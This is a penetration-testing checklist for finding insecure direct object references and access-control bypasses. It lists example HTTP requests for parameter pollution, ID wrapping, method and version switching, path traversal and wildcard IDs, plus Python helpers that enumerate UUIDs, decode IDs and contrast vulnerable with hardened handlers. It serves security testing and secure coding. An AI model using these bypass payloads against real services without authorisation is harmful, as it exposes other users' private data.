- [ ] Add parameters onto the endpoint. For example, if there was:
```
GET /api/v1/getuser HTTP/1.1
Host: example.com
Try this to bypass
GET /api/v1/getuser?id=1234 HTTP/1.1
Host: example.com
…
```
- [ ] Bypass by appending one of the following to the ID or path:
```
%20, %09, %0b, %0c, %1c, %1d, %1e, %1f, /
```
- [ ] Large Integer Values
```
GET /api/get_profile?user_id=350 → 403
Host: example.com
…
GET /api/get_profile?user_id=00000000000000350 → 200
Host: example.com
```
- [ ] Negative IDs, Decimal Numbers, String Values with Delimiters
```
#Negative IDs
GET /api/get_profile?user_id=-350
Host: example.com
Description:
Negative values might be treated differently by the application, possibly bypassing certain validation checks
………
#Decimal Numbers
GET /api/get_profile?user_id=350.0
Host: example.com
………
#String Values with Delimiters
GET /api/get_profile?user_id="350,351"
Host: example.com
```
- [ ] Check if the page source contains a numeric ID (Ctrl + U)
```
<form method="post" action="./QuotePrint.aspx?Id=27461&t=8220&isThrowEx=1" id="form1">
```
- [ ] Change self , me , etc. to your id
```
GET /api/me/get_profile
Host: example.com
…
#response show your info and your id
GET /api/25466/get_profile
Host: example.com
```
- [ ] Check if UUIDs are similar
```
#create two accounts and compare their UUIDs
example:
account1: f47ac10b-58cc-4372-a567-0e02b2c3d479
account2: f47ac10b-58cc-4372-a567-0e02b2c3d574
#only the last 3 hex digits differ, so brute-forcing 16^3 = 4096 values covers the space
```
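Turning the observation above into a candidate list is mechanical: find the prefix the two UUIDs share, count the hex digits that vary, and enumerate them. The following Python is an added example (not from the original checklist); the two account UUIDs are the constructed sample from the item above, and the `max_digits` guard is an assumption about what is still a realistic request budget.

```python
import uuid

# Constructed observation (mirrors the two accounts in the item above).
ACCOUNT1 = "f47ac10b-58cc-4372-a567-0e02b2c3d479"
ACCOUNT2 = "f47ac10b-58cc-4372-a567-0e02b2c3d574"


def shared_prefix(a: str, b: str) -> str:
    """Longest common prefix of two UUID strings, hyphens included."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return a[:n]


def varying_hex_digits(a: str, b: str) -> int:
    """Number of hex digits that differ after the shared prefix."""
    return len(a[len(shared_prefix(a, b)):].replace("-", ""))


def uuid_candidates(a: str, b: str, max_digits: int = 4) -> list:
    """Enumerate every UUID that shares the observed prefix.

    With k varying hex digits the space is 16**k (4096 for k == 3), versus the
    2**122 values a correctly generated random UUIDv4 ranges over. Refuses to
    build more than 16**max_digits candidates.
    """
    k = varying_hex_digits(a, b)
    if k > max_digits:
        raise ValueError(f"{k} varying digits: not a realistic brute-force space")
    prefix_hex = shared_prefix(a, b).replace("-", "")
    return [str(uuid.UUID(prefix_hex + format(n, "x").zfill(k)))
            for n in range(16 ** k)]


def looks_predictable(u: str) -> str:
    """Triage of a single UUID: version 1 embeds a timestamp and node ID."""
    parsed = uuid.UUID(u)
    if parsed.version == 1:
        return "v1 (time-based: timestamp and node, enumerable)"
    if parsed.version == 4:
        return "v4 (random if generated correctly; compare two samples)"
    return f"v{parsed.version}"
```

If two freshly created accounts share no prefix at all, `varying_hex_digits` is 32 and the guard fires, which is the expected result for a sound UUIDv4 generator; a shared prefix or a version-1 UUID is what makes the identifier guessable.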
- [ ] HTTP Parameter pollution
```
POST /api/get_profile HTTP/1.1
Host: example.com
user_id=hacker_id&user_id=victim_id
…
GET /api/get_profile?user_id=hacker_id&user_id=victim_id
Host: example.com
```
- [ ] Add .json to the endpoint
```
GET /v2/GetData/1234 HTTP/1.1
Host: example.com
…
Try this to bypass
GET /v2/GetData/1234.json HTTP/1.1
Host: example.com
…
```
- [ ] Test on outdated API Versions

| Initial Request | Bypass Request |
| --- | --- |
| `POST /v1/GetData HTTP/1.1`<br>`Host: example.com`<br>`id=123` | `POST /v2/GetData HTTP/1.1`<br>`Host: example.com`<br>`id=123` |
- [ ] Wrap the ID with an array.
```
POST /api/get_profile HTTP/1.1
Host: example.com
{"user_id":111}
Try this to bypass
POST /api/get_profile HTTP/1.1
Host: example.com
{"user_id":[111]}
……..
#also
POST /api/get_profile HTTP/1.1
Host: example.com
{"user_id":[111,112]}
111 → your id
112 → victim id
```
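The `[111,112]` variant works when the handler authorises the request as a whole ("is the caller's ID among the requested IDs?") and then returns every object in the list. Below is an added Python example, not code from the original checklist, contrasting that handler with one that authorises each object; the in-memory `PROFILES` store and the caller/victim IDs 111 and 112 are constructed to match the item above.

```python
import json

# Constructed data store (not from the page): 111 is the caller, 112 the victim.
PROFILES = {
    111: {"name": "you", "email": "you@example.com"},
    112: {"name": "victim", "email": "victim@example.com"},
}


def requested_ids(body: str) -> list:
    """Accept the scalar form {"user_id": 111} and the array form {"user_id": [111, 112]}."""
    value = json.loads(body)["user_id"]
    return value if isinstance(value, list) else [value]


def vulnerable_get_profiles(body: str, caller: int) -> list:
    """Authorises the request once: "is the caller among the requested IDs?"

    Sending [caller, victim] satisfies that check, and every ID in the list is
    then returned, which is the bypass the item above describes.
    """
    ids = requested_ids(body)
    if caller not in ids:
        raise PermissionError("forbidden")
    return [PROFILES[i] for i in ids if i in PROFILES]


def hardened_get_profiles(body: str, caller: int) -> list:
    """Authorises each object: every requested ID must belong to the caller."""
    ids = requested_ids(body)
    if not ids or any(i != caller for i in ids):
        raise PermissionError("forbidden")
    return [PROFILES[i] for i in ids if i in PROFILES]


def leaks_victim(handler, body: str, caller: int) -> bool:
    """True if the handler returns the victim's profile to this caller."""
    try:
        return any(p["email"] == "victim@example.com"
                   for p in handler(body, caller))
    except PermissionError:
        return False
```

The same pattern applies to any batch endpoint: the authorisation decision has to be made per object, after the input has been normalised to the shape the data layer will actually use.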
- [ ] Wrap the ID with a JSON object
```
POST /api/get_profile HTTP/1.1
Host: example.com
…
{"user_id":111}
Try this to bypass
POST /api/get_profile HTTP/1.1
Host: example.com
…
{"user_id":{"user_id":111}}
```
- [ ] JSON Parameter Pollution (duplicate keys: some parsers keep the first occurrence, most keep the last).
```
POST /api/get_profile HTTP/1.1
Host: example.com
…
{"user_id":"hacker_id","user_id":"victim_id"}
```
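Both pollution items (the duplicated query parameter above and the duplicated JSON key here) depend on two components disagreeing about which occurrence counts. This added Python example, not code from the original checklist, shows the three common resolutions for a query string and the silent last-wins behaviour of `json.loads`, then a strict parser that rejects duplicates; the request strings are the constructed ones from the two items.

```python
import json
from urllib.parse import parse_qs, parse_qsl

# Constructed requests mirroring the two pollution items above.
QUERY = "user_id=hacker_id&user_id=victim_id"
BODY = '{"user_id":"hacker_id","user_id":"victim_id"}'


def query_first(qs: str) -> str:
    """Frameworks that keep the first occurrence."""
    return parse_qs(qs)["user_id"][0]


def query_last(qs: str) -> str:
    """Frameworks that keep the last occurrence (dict() over the pair list)."""
    return dict(parse_qsl(qs))["user_id"]


def query_all(qs: str) -> list:
    """Frameworks that expose every occurrence as a list."""
    return parse_qs(qs)["user_id"]


def json_lenient(body: str) -> str:
    """json.loads silently keeps the *last* duplicate key."""
    return json.loads(body)["user_id"]


def json_strict(body: str) -> dict:
    """Reject duplicate keys instead of letting one of them win."""
    def no_duplicates(pairs):
        obj = {}
        for key, value in pairs:
            if key in obj:
                raise ValueError(f"duplicate key: {key}")
            obj[key] = value
        return obj
    return json.loads(body, object_pairs_hook=no_duplicates)


def has_duplicate_keys(body: str) -> bool:
    """True if the body contains a repeated key (or is not valid JSON)."""
    try:
        json_strict(body)
        return False
    except ValueError:
        return True


def authz_then_fetch(qs: str) -> tuple:
    """The bypass: an authorisation layer that reads the first value paired
    with a data layer that reads the last. Returns (id_checked, id_fetched)."""
    return query_first(qs), query_last(qs)
```

When testing, send the duplicate in both orders (`hacker_id` first, then `victim_id` first) because which side wins depends on the stack, and a proxy or WAF in front of the application may resolve it differently again.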
- [ ] Try to decode the ID if it is encoded (base64, hex, etc.) or hashed (e.g. MD5 of a predictable value such as an email address or a sequential number, which can be recomputed for a guessed victim).
```
GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1
Host: example.com
…
dmljdGltQG1haWwuY29t => victim@mail.com
```
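A small decoder saves the round trip to CyberChef and also covers the hash case, where the token cannot be reversed but can be reproduced from a guess. The Python below is an added example, not code from the original checklist; the `victim@mail.com` token is the one from the item above and the guess list is a constructed input.

```python
import base64
import binascii
import hashlib

HASHES = {"md5": 32, "sha1": 40, "sha256": 64}  # hex digest lengths


def md5_hex(value: str) -> str:
    """Helper for building the hashed-ID case in a test."""
    return hashlib.md5(value.encode()).hexdigest()


def _printable(data: bytes) -> bool:
    return bool(data) and all(32 <= b < 127 for b in data)


def decode_candidates(token: str, guesses=()) -> list:
    """Return (scheme, plaintext) pairs for every way `token` can be read.

    Tries standard base64 (and URL-safe base64 when '-' or '_' is present),
    adding missing padding; then hex; then, when the token has the length of
    an MD5/SHA-1/SHA-256 hex digest, compares it with the digest of each
    guessed identity (e-mail, username, sequential ID).
    """
    found = []
    padded = token + "=" * (-len(token) % 4)
    attempts = [("base64", padded)]
    if "-" in token or "_" in token:
        attempts.append(("base64url", padded.replace("-", "+").replace("_", "/")))
    for scheme, text in attempts:
        try:
            data = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):
            continue
        if _printable(data):
            found.append((scheme, data.decode("ascii")))
    try:
        data = bytes.fromhex(token)
        if _printable(data):
            found.append(("hex", data.decode("ascii")))
    except ValueError:
        pass
    lowered = token.lower()
    for name, length in HASHES.items():
        if len(lowered) == length and all(c in "0123456789abcdef" for c in lowered):
            for guess in guesses:
                if hashlib.new(name, guess.encode()).hexdigest() == lowered:
                    found.append((name, guess))
    return found
```

A decoded value that is an e-mail address, username or small integer means the "opaque" ID is just an encoding of something guessable, and the rest of this checklist applies to the decoded value.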
- [ ] If the website uses GraphQL, try to find IDOR through the GraphQL endpoint.
```
GET /graphql HTTP/1.1
Host: example.com
…
GET /graphql.php?query= HTTP/1.1
Host: example.com
```
- [ ] MFLAC (Missing Function Level Access Control): try case variations of a protected path
```
GET /admin/profile HTTP/1.1
Host: example.com
Try this to bypass
GET /ADMIN/profile HTTP/1.1
Host: example.com
…
```
- [ ] Try to swap the UUID with a number
```
GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1
Host: example.com
…
Try this to bypass
GET /file?id=302
Host: example.com
…
```
- [ ] Change HTTP Method
```
GET /api/v1/users/profile/111 HTTP/1.1
Host: example.com
…
Try this to bypass
POST /api/v1/users/profile/111 HTTP/1.1
Host: example.com
PATCH /api/v1/users/profile/111 HTTP/1.1
Host: example.com
```
- [ ] Path traversal
```
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
…
Try this to bypass
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
…
```
- [ ] Change the request `Content-Type`
```
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-Type: application/xml
Try this to bypass
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-Type: application/json
```
- [ ] Send a wildcard instead of the ID
```
GET /api/users/111 HTTP/1.1
Host: example.com
…
Try this to bypass
GET /api/users/* HTTP/1.1
Host: example.com
…
GET /api/users/% HTTP/1.1
Host: example.com
…
GET /api/users/_ HTTP/1.1
Host: example.com
…
GET /api/users/. HTTP/1.1
Host: example.com
```
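The `%` and `_` probes above pay off when the lookup behind the endpoint uses SQL `LIKE` on the identifier: the query is parameterised, so it is not injectable, but the pattern metacharacters in the value are still interpreted. This added Python example (not code from the original checklist) reproduces that with an in-memory SQLite table, which is a constructed assumption about the backend, and shows the two fixes: an equality lookup, or escaping with an explicit `ESCAPE` clause when a pattern match is genuinely required. `*` and `.` target other pattern engines (GLOB, filesystem globs, regular expressions) and are not modelled here.

```python
import sqlite3

# Constructed table (not from the page): one row per user.
ROWS = [(111, "you", "you@example.com"),
        (112, "victim", "victim@example.com"),
        (113, "admin", "admin@example.com")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, handle TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_like(conn, handle: str) -> list:
    """Vulnerable: parameterised, so not injectable, but LIKE still interprets
    '%' (any run of characters) and '_' (any single character) in the value."""
    cur = conn.execute("SELECT email FROM users WHERE handle LIKE ?", (handle,))
    return [row[0] for row in cur]


def lookup_exact(conn, handle: str) -> list:
    """Hardened: an identifier lookup is an equality test, never a pattern."""
    cur = conn.execute("SELECT email FROM users WHERE handle = ?", (handle,))
    return [row[0] for row in cur]


def lookup_like_escaped(conn, handle: str) -> list:
    """If LIKE is required (e.g. a search box), escape the metacharacters and
    tell the engine which escape character was used."""
    escaped = (handle.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    cur = conn.execute("SELECT email FROM users WHERE handle LIKE ? ESCAPE '\\'",
                       (escaped,))
    return [row[0] for row in cur]
```

A single `%` returning every row, or `___` returning only three-character handles, is the signal that the identifier is being matched as a pattern; the same test distinguishes the vulnerable lookup from either fixed version.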